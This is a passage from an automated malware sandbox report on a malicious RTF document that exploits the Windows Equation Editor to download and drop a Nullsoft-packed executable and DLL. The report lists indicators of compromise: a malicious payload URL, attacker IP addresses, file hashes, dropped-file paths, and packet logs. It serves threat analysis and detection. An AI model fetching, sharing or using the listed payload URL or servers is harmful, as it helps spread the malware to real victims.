                                                    3fbdTbPuA2dsNJL.exeGet hashmaliciousBrowse
                                                    • 154.201.165.231
                                                    HXHpRUwveo.exeGet hashmaliciousBrowse
                                                    • 156.230.124.222
                                                    CATALOG.exeGet hashmaliciousBrowse
                                                    • 156.252.92.240
                                                    PaymentBNK#2.PDF.exeGet hashmaliciousBrowse
                                                    • 154.201.206.137
                                                    u87sEvt9v3.exeGet hashmaliciousBrowse
                                                    • 160.124.11.194
                                                    CLOUDIE-AS-APCloudieLimitedHKe3921ea8_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    FROCH ENTERPRISE PROFILE.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    c1c943e6_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    Inquiry 05042021.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    machine spares .docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    SWIFT COPY.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    HCU213DES.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    calvary petroleum.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    Sidertaglio PO_20210305.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    PO 9661641.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    DocNo2300058329.doc__.rtfGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    payment invoice.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    9327ac21_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    Request for New Quote - Valve Ist Order.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    INV 57474545.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    Order List No1638829.xlsxGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    GTRFQ-21-2332-1079-STRUCTURAL STEEL.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    RFQ for MR 29483 for Affordable Villa.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    Request for Quotation_28042021.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    RFQ-NEW ORDER BERUIT 67271929.xlsxGet hashmaliciousBrowse
                                                    • 185.239.243.112

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    C:\Users\user\AppData\Roaming\propser16364.exeInquiry 05042021.docGet hashmaliciousBrowse
                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\prosperx[1].exeInquiry 05042021.docGet hashmaliciousBrowse
                                                        C:\Users\user\AppData\Local\Temp\nsxAB11.tmp\ghvea31n0uw.dllInquiry 05042021.docGet hashmaliciousBrowse
                                                          ihnxvs562g.exeGet hashmaliciousBrowse

                                                            Created / dropped Files

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\prosperx[1].exe
                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                            Category:downloaded
                                                            Size (bytes):233896
                                                            Entropy (8bit):7.897874862072268
                                                            Encrypted:false
                                                            SSDEEP:6144:lPXI0pTaBRvIJ331V2a3tOuUggm29YsS7cty0jSO8PIlI1L:a0pTanIJHOggm8cIJaB
                                                            MD5:AA6168D4E41CED2091BAEE9F5D59E11E
                                                            SHA1:DE7F4A8270FE216E68076CE93243B60D6D6D5F51
                                                            SHA-256:7C6393B4E86EA5CEC49C0F814B17E4BB85AA447C19896037252A94FF6416CE1B
                                                            SHA-512:37C5D51495C0B53BDCD522D3B4A0346202D6069002B8D35F913A96596EB1A51C4FA41E445673024FBB62B4F701355AABB2E1804075709693C6339D1C3DAD95E2
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: Metadefender, Detection: 12%, Browse
                                                            • Antivirus: ReversingLabs, Detection: 66%
                                                            Joe Sandbox View:
                                                            • Filename: Inquiry 05042021.doc, Detection: malicious, Browse
                                                            Reputation:low
                                                            IE Cache URL:http://carbinz.gq/modex/prosperx.exe
                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG.sw..PG..VA..PG.Rich.PG.........PE..L.....$_.................d..........a4............@.......................................@.................................8........................................................................................................................text...<b.......d.................. ..`.rdata..t............h..............@..@.data...X............|..............@....ndata.......P...........................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0EAA9687-30AB-4901-9D2A-3CE504568F55}.tmp
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):1024
                                                            Entropy (8bit):0.05390218305374581
                                                            Encrypted:false
                                                            SSDEEP:3:ol3lYdn:4Wn
                                                            MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                            Malicious:false
                                                            Reputation:high, very likely benign file
                                                            Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F7C72BCE-A594-453E-90B7-97C10E531855}.tmp
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):10770
                                                            Entropy (8bit):3.5763480757362074
                                                            Encrypted:false
                                                            SSDEEP:192:/iK1WRR6FGCgWZRB2QGwtRxxbk3ylK7tybCs4JoFmp3/lqNwwpnwLQT5vmx+x9I:/7WMBZRB26LHbUy8wYKW/3UT52m9I
                                                            MD5:087E851211D2CFCEC7A36FC880D4BDEE
                                                            SHA1:FDE27ADC3042DFFB257A8C7BB04084987EA3B508
                                                            SHA-256:FC69CA6FFFED9AAC3E4E1E2BA2DA4A99304DC901EF61049147DD300B1612A9AE
                                                            SHA-512:317A58E11F9C0E7CF7418925025BCCB6CDC1A4688B157421F8A928C86A9297701F89E19811444B5EAD80D1003E66EBF1DEDB251E062D26BCDFB5DB0D7C602D0F
                                                            Malicious:false
                                                            Preview: ?.'.*.@.:.>.'.2.'.?.-.&.1...*./.=.%.<.-.$.?.].-.|.-.].!.-..._.<.%._.;._.?.2.$...%.4.:...-./...)._.5.?.%.#.0.7.:.(.9.`.1.-.'.9.,.3.2.!.+._.%.].%.|...$.=.6.#.!.|.?.6.[.>.?.`.5.].<.?.(.?.;.#.].?.1.-.|.+.:.~.#.<.(.2.,.*.?.2.?.).=.8.'.6.).#.-.,.`.1.%.1.|.3.5.*.1...>.3.=.7.5.,.~./.?.%.?.,.?.$.$.,.%.%.0.0.).+.).*.~.<.+.-.?.?.>.[.<.>.-...?.%.&.@.;.5.;...*.+.$.@.'.].?...*.*.>.(.0.!.1.9.4.:.%...4.`.8.>.*.<.!.|.7./.`.(.7.-.?.|.5.,.3.?.[.0.-.'.|.~.~.0.6.8.?.1.?.'.?.?.(.1.?.6.$.`.0.6.*.>.7.$.?.*.9.2.>.0..._.].]./.0...+.?...:.~...>.'.>...<.*.+.'...`.4.@.|.2.].~.1.&.`.#.$.!.^.`.1.*.6.~.?.3.,.,.|...!.?.&.(.,.5.-.!.&.<.!./.(.!.1.%.?./.(.~.7...+.~.;.*.,.....%.-.?.&.?.].....?.].1.2.3./.[.)...%./.^.].?.@.|._.4...,...&.&.[.3.>.;.`.%.,.,.[.#._.).>.:.$.-.+.!.5...[.=.?.>.2.?...4.4.0...8.7.?.:.2.'.7...#.7.<.0.?.?.8.-.).%.7.&.2...4.|.;.$.%.`...-.~.%...<.-.&.=.?.?.,.?.<.?.(.....|.[.[.]...?.).?.|.0.>.$.`.4.^...'.3.<./.&._.1.`.<.-.9.%...%.:.!...?.^.(.9.%.!.>.@.,.`.?.1.|...0.].'.?.3.&.?./...9.1.+.6.6.0...=.(.8.9.#.
                                                            C:\Users\user\AppData\Local\Temp\1e000hwxgklm05j
                                                            Process:C:\Users\user\AppData\Roaming\propser16364.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):185856
                                                            Entropy (8bit):7.9990641518082
                                                            Encrypted:true
                                                            SSDEEP:3072:FanZAkL0cPKmJXx5y2ZrSMsEk89zzxpqDdw0lCuwuTxDbAzSCMnD0KNeS6XBpGb:FSL66fF2MXkMzzxp4dw0lCQDsG7Zf
                                                            MD5:0E043A70F7132DE9752A3A00D0E81709
                                                            SHA1:5E6406075974431A850271D0D9BFD3A8B25A66CC
                                                            SHA-256:E1805165F3143A70B264E2D209D73B08B23E49325B69BA26A99D027E14031214
                                                            SHA-512:FC1AA01D05CEA2A6DC5790EAF774BC873482DA8FD27628280B9AAEAC446C4E89EF7A0205071F94E1EEA2C87F8C662B7D169890CA3B479C52BCCBE623785AB627
                                                            Malicious:false
                                                            Preview: M&.cf....@R..y.;.......oW.A?..q.;...t.]......z.d...O..y..q+|.a.Xc.;..V.&ZHk;N.Df.$.....J..>.....v..Rm..1h..u.em..I..E.y..z...YKa.E1....u{N.O.8...)1.i...[..2c#my..6.;t.\g.......;m.>.:o..5....U....M..Z..x..$...E.........=...~:?..`.t.Y,...2.....X.q.w_.YIK..0=..:..%.]..7._..n9...'..C....<..=..8.x...x..B)}.....'...Q.$..Q.a`(D.q.?....E%~a...0....F.].......|......Ye....>....ShCz.P.`O."......M2V....t.W.(..8e~..nE.P..A{(...J...........H....0..@IzXO...&.+.ed{..z....'....."..-...!.f..@.]...z14x.&9..:......&..1..oh,E.c..2.U..^..~............L/8$g.!.C.+.l.2c.B.\.Y4......hN!....9.W.._7..5.G.R-...{oI.TA!....*.......<I......U...C~.|.F............[2.....P..0..R(.l$t/..d..;z.........I'}p?..W.....&.n.6......].:B...A...\n..cQ.)2..BX.h..v..GZ(..W....I.<H.....s.5=...].R3N....F&.Zpig..c....c. ..|6.3..b.,Y@..-..#.Q...-.........*{...f.0.mq...N.9..M.Wv.....R.3~.J..5...G.?L38O.bG......[.......k.Q.M=Kz.s.>......o.9BnH].y.K.E,"|ob..,.]H.u....j.
                                                            C:\Users\user\AppData\Local\Temp\92ta8lv1ui5nbpv
                                                            Process:C:\Users\user\AppData\Roaming\propser16364.exe
                                                            File Type:PGP\011Secret Key -
                                                            Category:dropped
                                                            Size (bytes):6661
                                                            Entropy (8bit):7.720398689518916
                                                            Encrypted:false
                                                            SSDEEP:192:TAWtSj2Y4s3jPIeXbzblhmGSkUwW1sKal3:TAWtSV3jPXXbzbeG6BaV
                                                            MD5:001DEAC62FFE30ED641352197488000F
                                                            SHA1:AF88F97944FAFF6E0A3FA6ECF8F1A50B58359905
                                                            SHA-256:BB8E07C8E3D229E06690D68EF4BF55DB64A7CC2E6FFB08A06961844C45F1B4A2
                                                            SHA-512:8D578AB4DE02B0696B8CD87A4593B400063E14FA55F01201D4559C0D14574286F4A4D1F70B44D4D73EC8811DCFE83AEE543ACD538CCB2321CC8D11919A488D38
                                                            Malicious:false
                                                            Preview: ..Hj^.%..!.*M.R%m."....*...=...1.nM.V.A.d*.%.l-"..5.b.~.....i.g.t.r@X.YYU~.f4..%%.Zv.j(.....v.6.\T.mmYb..b..ii.Nn>V....j.R.UA.@Dlc...)%.\`hO1.3......{iKg1].dh@..?+.Q.PT\s]3_........Gc.?iie....Dl.UUQ..n...%..^..j(.>jjR.X.N..:...~@.f...Vl.2...brJb.(....]..c...)...g.W../Wc.k%..ksKkU.....A..K.c.Ohl.KU;W..?...g.o.X@.AAmf...L$.]]iR..2......~|nf4\BeeA.."*.P2QQ]v\6^......b.Jb.Rhld....Am.TXPgK.[.....,cmCo)%o. h...]U+PX\g..%"_VCn..W..N...;j#kie.OHX/YYU...W]iS.?.+...f.D........_k@.nf.+k.]L.S.........~Y...lab.`.R6%QGPT\.3....uRBjN..M%. hl.W..6P..b0.~Z...S...7...b.....\.eeA.r.[.Utwk..g#...^F...twk..gcXd.Amm...T5QHGW.......FR.s.(..l.'..{:6V)Q.T\`Wd..IE.......[.ffYA.DlPQ-.ZYezb.....3.....o.....S]..@.g .[5...8.k..-;...$..(..4\.eeA\.g....$s.lW..$w....S...,nL..i..(...`ZbfT..U.*%..).... .dhj^.Yb.\T7k~\..."a..*/d....$).eccgD..<P.SQQ.vgR#Z'++.b.f.j..LfF0doQmm.Y.BQQ]..`.Y,...).......df1ANflP.\q.P.K`hl..u.@....{.g"9..CMU.BPXQ.OTI*h.{.......h..........H.[<.gY...p.x=.x..p.g.%.?T.s@d{kz
                                                            C:\Users\user\AppData\Local\Temp\nshAAB2.tmp
                                                            Process:C:\Users\user\AppData\Roaming\propser16364.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):201274
                                                            Entropy (8bit):7.954324784115958
                                                            Encrypted:false
                                                            SSDEEP:3072:cxJkifanZAkL0cPKmJXx5y2ZrSMsEk89zzxpqDdw0lCuwuTxDbAzSCMnD0KNeS6W:cMifSL66fF2MXkMzzxp4dw0lCQDsG7Z
                                                            MD5:02AA3F2DF8A114CF5F305E56B633F14E
                                                            SHA1:EEBD4C911882C0BA37C58B5850A9E3A1EA6B8DE9
                                                            SHA-256:95135718C211453FF5053D7559EFFD535B93CB4AEF7FAC75C5579D773A281E50
                                                            SHA-512:4D2078D513B843F125F8D4576ED4BB3150E87638A659F2C2FEA77387DB62B3C798C9A9CCBBBB6B5AF3A0F54600F35A489F9DD0A19D9A369300527ACEAAD0E445
                                                            Malicious:false
                                                            Preview: %.......,...............................?.......%...........................................................................................................................................................................................................................................J...................g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            C:\Users\user\AppData\Local\Temp\nsxAB11.tmp\ghvea31n0uw.dll
                                                            Process:C:\Users\user\AppData\Roaming\propser16364.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):5120
                                                            Entropy (8bit):4.3876199384204115
                                                            Encrypted:false
                                                            SSDEEP:48:aifqEm3n1ASkT3rNDZbitP8XVlRYB0Kpgq1nh/SS72+DtMYquSzieLCRuqS:/S3n1ASkfNDZ+tgfYB0m/2otsJzsx
                                                            MD5:7BEE24F38E906D08F10C1B51BE4BE749
                                                            SHA1:588F2F0F8B859E15620FBEC8E6381C6ADDF2A3FD
                                                            SHA-256:974E158EA37951D137839D4189279330AA2E85F5BAFA4F273F7007673CD4D3FC
                                                            SHA-512:417032D0C0DECACD4332D9379843EF358B553960A2C00CAF470D129F6F797AED3EB180A3E2182EB5E443772D24B8E8C7FE4BD3B06909B2A555A8E7C063137E25
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 21%
                                                            Joe Sandbox View:
                                                            • Filename: Inquiry 05042021.doc, Detection: malicious, Browse
                                                            • Filename: ihnxvs562g.exe, Detection: malicious, Browse
                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........n"...L..L..L..gH..L.dM..L..M..L..fH..L..fL..L..f...L..fN..L.Rich..L.................PE..L... ;.`...........!......................... ...............................P......................................`!..P....".......@............................... ............................... ..@............ ...............................text...l........................... ..`.rdata..".... ......................@..@.data...L....0......................@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\c8080fbf_by_Libranalysis.LNK
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue May 4 11:36:27 2021, mtime=Tue May 4 11:36:27 2021, atime=Tue May 4 11:36:34 2021, length=385915, window=hide
                                                            Category:dropped
                                                            Size (bytes):2168
                                                            Entropy (8bit):4.586196942224177
                                                            Encrypted:false
                                                            SSDEEP:48:8i/XT0jSn+LCOEnpN0OEhz4Qh2i/XT0jSn+LCOEnpN0OEhz4Q/:8i/XojS+GFpN0Fhz4Qh2i/XojS+GFpN+
                                                            MD5:807D638D75FB3AF2AE8C4DE1E22B2C37
                                                            SHA1:BEE66992C36BA6D3E1F6F8402DA281B01E33FC9B
                                                            SHA-256:928A0D6070F7EE1E31AE178971CD32ED3AC191EEA81CBBE23F6C2EC79C31760C
                                                            SHA-512:4A7848A7740E8A8A178D4A29B1AA267C2F05891C19759882C066F497E0A44F2CCD2E0C245D796BCEF676860663C0ABF9A44A5050C08040C70D55887C3B66A961
                                                            Malicious:false
                                                            Preview: L..................F.... ...g.+..@..g.+..@...+G..@..{............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R.d..Desktop.d......QK.X.R.d*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.{....R.d .C8080F~1.RTF..f......R.d.R.d*...9&....................c.8.0.8.0.f.b.f._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...r.t.f.......................-...8...[............?J......C:\Users\..#...................\\210979\Users.user\Desktop\c8080fbf_by_Libranalysis.rtf.3.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.c.8.0.8.0.f.b.f._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......
                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):112
                                                            Entropy (8bit):4.376726047143515
                                                            Encrypted:false
                                                            SSDEEP:3:HNNpHDsc6kUwSLMp6ledZHDsc6kUwSLMp6lmxWNNpHDsc6kUwSLMp6lv:HNjQc6bNSZQc6bNVjQc6bNf
                                                            MD5:A52333358A570C730478696C25FF9EEA
                                                            SHA1:9F28ED9BBC8038877546637C0A87F90647D6FD62
                                                            SHA-256:7E2E6278AEA47E0EFFE08FF92A5482391835FC1D508A0B81B75D34038A3EAFD4
                                                            SHA-512:972868D8FCF7D202BCFBFA2E6D76803481BCE22C5147C7C9456F0FD689D5AD61BB9B70CF6815D44A0130EA1E8352B95559AD53D0AF4176AAB32555A3B31AC348
                                                            Malicious:false
                                                            Preview: [misc]..c8080fbf_by_Libranalysis.LNK=0..c8080fbf_by_Libranalysis.LNK=0..[misc]..c8080fbf_by_Libranalysis.LNK=0..
                                                            C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):162
                                                            Entropy (8bit):2.431160061181642
                                                            Encrypted:false
                                                            SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                            MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                            SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                            SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                            SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                            Malicious:false
                                                            Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                                            C:\Users\user\AppData\Roaming\propser16364.exe
                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                            Category:dropped
                                                            Size (bytes):233896
                                                            Entropy (8bit):7.897874862072268
                                                            Encrypted:false
                                                            SSDEEP:6144:lPXI0pTaBRvIJ331V2a3tOuUggm29YsS7cty0jSO8PIlI1L:a0pTanIJHOggm8cIJaB
                                                            MD5:AA6168D4E41CED2091BAEE9F5D59E11E
                                                            SHA1:DE7F4A8270FE216E68076CE93243B60D6D6D5F51
                                                            SHA-256:7C6393B4E86EA5CEC49C0F814B17E4BB85AA447C19896037252A94FF6416CE1B
                                                            SHA-512:37C5D51495C0B53BDCD522D3B4A0346202D6069002B8D35F913A96596EB1A51C4FA41E445673024FBB62B4F701355AABB2E1804075709693C6339D1C3DAD95E2
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: Metadefender, Detection: 12%, Browse
                                                            • Antivirus: ReversingLabs, Detection: 66%
                                                            Joe Sandbox View:
                                                            • Filename: Inquiry 05042021.doc, Detection: malicious, Browse
                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG.sw..PG..VA..PG.Rich.PG.........PE..L.....$_.................d..........a4............@.......................................@.................................8........................................................................................................................text...<b.......d.................. ..`.rdata..t............h..............@..@.data...X............|..............@....ndata.......P...........................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                            C:\Users\user\Desktop\~$080fbf_by_Libranalysis.rtf
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):162
                                                            Entropy (8bit):2.431160061181642
                                                            Encrypted:false
                                                            SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                            MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                            SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                            SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                            SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                            Malicious:false
                                                            Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...

                                                            Static File Info

                                                            General

                                                            File type:Rich Text Format data, unknown version
                                                            Entropy (8bit):3.026434688354018
                                                            TrID:
                                                            • Rich Text Format (5005/1) 55.56%
                                                            • Rich Text Format (4004/1) 44.44%
                                                            File name:c8080fbf_by_Libranalysis.rtf
                                                            File size:385915
                                                            MD5:c8080fbfc825b01f11973566f1a3e589
                                                            SHA1:9aa04e64414bef6504b211615f7fcdbe84cd75df
                                                            SHA256:af801e43101c06e3366d942715a8b10f90f12ec3437cab1b8a0cc3872101eebe
                                                            SHA512:90775d8a921c9b094bbd1bb4bd20e11f997d70ad1f465fdfae6459cbb7e311116e434908caacf4b7844229d9835134180f549cd5d95e42a8305f98860fd23ce6
                                                            SSDEEP:6144:jH5dzMKnIGWZelMba7pAlU+mJhnAQsrNaGfxp+h+/LOwYn1E1vADCWgol06l6uON:AOwAokd0
                                                            File Content Preview:{\rtf2746?'*@:>'2'?-&1.*/=%<-$?]-|-]!-._<%_;_?2$.%4:.-/.)_5?%#07:(9`1-'9,32!+_%]%|.$=6#!|?6[>?`5]<?(?;#]?1-|+:~#<(2,*?2?)=8'6)#-,`1%1|35*1.>3=75,~/?%?,?$$,%%00)+)*~<+-??>[<>-.?%&@;5;.*+$@']?.**>(0!194:%.4`8>*<!|7/`(7-?|5,3?[0-'|~~068?1?'??(1?6$`06*>7$?*92

                                                            File Icon

                                                            Icon Hash:e4eea2aaa4b4b4a4

                                                            Static RTF Info

                                                            Objects

                                                            IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                            000001304hno

                                                            Network Behavior

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            May 4, 2021 05:37:00.640736103 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.689276934 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.689450979 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.689927101 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.738321066 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.738962889 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.738993883 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.739018917 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.739044905 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.739072084 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.739099026 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.739124060 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.739130020 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.739146948 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.739147902 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.739172935 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.739176035 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.739197969 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.739211082 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.739244938 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.756356955 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.788916111 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.788961887 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.788986921 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.789012909 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.789038897 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.789067030 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.789092064 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.789115906 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.789122105 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.789141893 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.789144039 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.789166927 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.789167881 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.789189100 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.789191008 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.789207935 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.789215088 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.789242029 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.789258003 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.789298058 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.789324999 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.789340973 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.789349079 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.789362907 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.789372921 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.789414883 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.789414883 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.789418936 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.789438963 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.789460897 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.789465904 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.789477110 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.789490938 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.789499998 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.789520979 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.790887117 CEST4916780192.168.2.22185.239.243.112
